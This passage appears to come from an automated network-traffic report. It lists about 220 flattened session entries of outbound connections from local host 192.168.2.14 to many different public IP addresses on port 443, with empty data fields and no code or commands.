                                      19426192.168.2.1439540171.190.70.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19427192.168.2.144670241.15.28.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19428192.168.2.1455074220.42.158.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19429192.168.2.1433126135.198.254.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19430192.168.2.1450456207.44.193.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19431192.168.2.143473284.134.158.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19432192.168.2.143592094.14.64.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19433192.168.2.144698818.60.137.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19434192.168.2.1459230137.45.129.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19435192.168.2.14387029.142.241.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19436192.168.2.143386431.211.143.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19437192.168.2.145197041.79.220.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19438192.168.2.144693278.193.6.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19439192.168.2.145406072.68.236.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19440192.168.2.144145082.139.54.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19441192.168.2.145534291.182.61.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19442192.168.2.1445852210.34.22.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19443192.168.2.1459580163.110.122.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19444192.168.2.1460434223.226.45.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19445192.168.2.144679675.39.70.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19446192.168.2.1440056175.85.43.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19447192.168.2.1449890189.57.137.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19448192.168.2.145661499.29.215.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19449192.168.2.1453352109.43.232.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19450192.168.2.1449204163.115.251.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19451192.168.2.146004843.4.5.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19452192.168.2.1432952156.182.55.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19453192.168.2.1458518180.53.61.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19454192.168.2.1451928168.241.94.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19455192.168.2.1451014161.94.193.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19456192.168.2.1453804209.70.202.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19457192.168.2.14457909.113.140.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19458192.168.2.144886299.222.243.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19459192.168.2.1432970117.214.178.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19460192.168.2.144400246.88.144.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19461192.168.2.144358469.242.128.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19462192.168.2.145653034.147.202.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19463192.168.2.1434850138.138.35.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19464192.168.2.143498662.213.105.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19465192.168.2.1438392221.136.14.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19466192.168.2.1448124181.32.50.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19467192.168.2.1449608140.82.81.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19468192.168.2.1445584122.237.70.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19469192.168.2.144319648.84.239.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19470192.168.2.1434578132.239.55.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19471192.168.2.143934624.161.81.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19472192.168.2.1460120122.72.116.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19473192.168.2.145071635.119.1.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19474192.168.2.1435562130.232.73.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19475192.168.2.1452658167.229.174.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19476192.168.2.145058820.2.37.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19477192.168.2.14403224.94.222.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19478192.168.2.1453288120.71.117.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19479192.168.2.1432824146.48.3.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19480192.168.2.145758880.106.217.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19481192.168.2.1447790223.33.74.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19482192.168.2.144897658.87.143.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19483192.168.2.143607694.59.108.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19484192.168.2.1447170136.163.115.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19485192.168.2.1435894206.165.212.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19486192.168.2.1447346102.148.197.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19487192.168.2.1443374184.118.70.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19488192.168.2.1459436147.98.189.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19489192.168.2.1447702178.234.24.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19490192.168.2.144873669.246.35.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19491192.168.2.145558276.72.5.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19492192.168.2.1433718114.254.97.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19493192.168.2.1439832109.253.132.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19494192.168.2.143300254.81.21.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19495192.168.2.145765845.224.91.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19496192.168.2.143278439.3.124.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19497192.168.2.1457330146.216.246.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19498192.168.2.1439370132.113.33.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19499192.168.2.1437812132.75.179.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19500192.168.2.143456664.4.54.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19501192.168.2.1460304195.132.92.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19502192.168.2.145502851.69.252.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19503192.168.2.144297814.174.245.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19504192.168.2.1434580183.175.106.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19505192.168.2.144759282.82.158.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19506192.168.2.1441898191.178.213.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19507192.168.2.1449404193.121.184.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19508192.168.2.143549225.245.118.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19509192.168.2.144684645.190.161.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19510192.168.2.1453416136.106.169.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19511192.168.2.146092032.112.155.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19512192.168.2.1457172139.71.158.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19513192.168.2.145228842.49.70.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19514192.168.2.1452886154.253.246.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19515192.168.2.1451790165.84.164.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19516192.168.2.144896478.12.234.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19517192.168.2.1438496172.182.159.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19518192.168.2.1455510175.242.214.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19519192.168.2.1447962130.83.118.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19520192.168.2.1446462222.49.9.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19521192.168.2.14417125.191.224.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19522192.168.2.1443238213.150.115.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19523192.168.2.1442742114.53.101.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19524192.168.2.145958058.58.97.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19525192.168.2.1454260166.180.1.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19526192.168.2.144275882.148.19.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19527192.168.2.1436150164.61.26.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19528192.168.2.1438510122.135.159.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19529192.168.2.1433694116.96.19.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19530192.168.2.1435208151.235.208.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19531192.168.2.145382213.221.72.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19532192.168.2.1435182219.112.131.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19533192.168.2.144732023.71.155.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19534192.168.2.143726445.217.242.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19535192.168.2.144665441.100.143.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19536192.168.2.1449630160.85.220.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19537192.168.2.143365634.79.197.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19538192.168.2.1457230155.246.203.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19539192.168.2.143707084.253.181.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19540192.168.2.1440294178.251.84.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19541192.168.2.144835081.51.193.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19542192.168.2.144145285.18.192.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19543192.168.2.1441118192.127.189.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19544192.168.2.1457216170.118.83.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19545192.168.2.1456368151.131.70.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19546192.168.2.1439782121.71.98.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19547192.168.2.144666447.22.6.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19548192.168.2.1459094195.38.186.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19549192.168.2.1459334149.166.163.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19550192.168.2.1442948213.246.88.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19551192.168.2.143671677.206.3.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19552192.168.2.144039673.118.32.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19553192.168.2.1450038160.195.132.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19554192.168.2.14552542.175.83.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19555192.168.2.143717287.21.149.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19556192.168.2.1443144129.239.27.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19557192.168.2.144537469.157.26.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19558192.168.2.143298079.9.148.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19559192.168.2.144323617.71.33.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19560192.168.2.1445952203.94.203.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19561192.168.2.1439450219.142.114.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19562192.168.2.143872862.99.135.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19563192.168.2.1449112101.111.32.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19564192.168.2.1439542193.108.235.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19565192.168.2.1438618128.190.165.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19566192.168.2.1441618186.236.87.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19567192.168.2.145912498.59.98.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19568192.168.2.1434240207.156.121.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19569192.168.2.14584882.71.65.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19570192.168.2.1436862188.204.239.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19571192.168.2.1460154209.182.147.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19572192.168.2.1460054185.33.84.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19573192.168.2.1438770185.39.223.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19574192.168.2.1447384139.73.79.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19575192.168.2.1457554159.85.154.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19576192.168.2.145406412.3.43.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19577192.168.2.1434462145.86.169.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19578192.168.2.14442522.164.146.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19579192.168.2.144337486.96.56.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19580192.168.2.143506654.249.115.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19581192.168.2.1445774120.137.252.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19582192.168.2.144798071.226.91.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19583192.168.2.1445032159.193.213.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19584192.168.2.1456584153.248.25.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19585192.168.2.1457460186.89.183.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19586192.168.2.1433706149.35.244.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19587192.168.2.14564342.26.145.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19588192.168.2.1456474114.232.219.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19589192.168.2.1446294166.59.57.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19590192.168.2.1447742144.224.96.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19591192.168.2.1446938137.124.178.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19592192.168.2.1451458170.50.126.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19593192.168.2.1450004171.159.140.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19594192.168.2.1438390171.93.168.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19595192.168.2.144130454.94.254.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19596192.168.2.145050080.36.94.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19597192.168.2.1437948171.44.183.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19598192.168.2.143643072.167.13.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19599192.168.2.146040050.69.65.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19600192.168.2.1454788121.47.212.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19601192.168.2.1439830167.242.153.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19602192.168.2.1437788201.140.58.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19603192.168.2.1450460203.38.201.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19604192.168.2.145883657.212.208.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19605192.168.2.1451812136.128.143.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19606192.168.2.1439754193.105.110.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19607192.168.2.144634498.220.196.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19608192.168.2.1444488208.2.155.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19609192.168.2.1433120105.199.107.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19610192.168.2.1453368206.219.253.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19611192.168.2.1437472203.82.25.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19612192.168.2.1444452198.64.45.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19613192.168.2.1458558197.1.77.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19614192.168.2.1456406102.248.222.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19615192.168.2.1449512174.7.146.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19616192.168.2.145320068.108.53.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19617192.168.2.1457570179.92.21.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19618192.168.2.1457072185.131.137.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19619192.168.2.1440786139.139.181.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19620192.168.2.144799480.9.50.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19621192.168.2.1433430180.30.94.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19622192.168.2.1446832122.87.122.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19623192.168.2.143411093.186.59.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19624192.168.2.1453338194.62.161.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19625192.168.2.1447714111.176.115.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19626192.168.2.144821851.158.131.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19627192.168.2.145168636.125.222.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19628192.168.2.1445796208.52.28.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19629192.168.2.144701078.168.127.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19630192.168.2.1452042104.114.191.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19631192.168.2.1437872220.87.244.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19632192.168.2.145158091.16.200.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19633192.168.2.144737649.88.99.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19634192.168.2.1433970171.182.63.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19635192.168.2.145130291.125.95.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19636192.168.2.143891052.206.47.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19637192.168.2.145317247.131.44.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19638192.168.2.1452546156.111.93.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19639192.168.2.144717284.92.29.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19640192.168.2.1449182157.156.219.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19641192.168.2.1437488155.243.132.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19642192.168.2.146053062.252.218.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19643192.168.2.1435312192.9.183.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19644192.168.2.1455610113.250.224.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19645192.168.2.1448034117.163.244.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19646192.168.2.144690692.236.62.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19647192.168.2.1453588158.25.33.38443
                                      TimestampBytes transferredDirectionData


